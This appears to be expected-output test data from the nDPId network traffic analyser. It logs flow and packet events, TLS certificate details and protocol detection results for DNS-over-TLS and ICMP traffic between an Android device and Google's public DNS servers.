{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} 
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} 
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 
+01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 
00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} 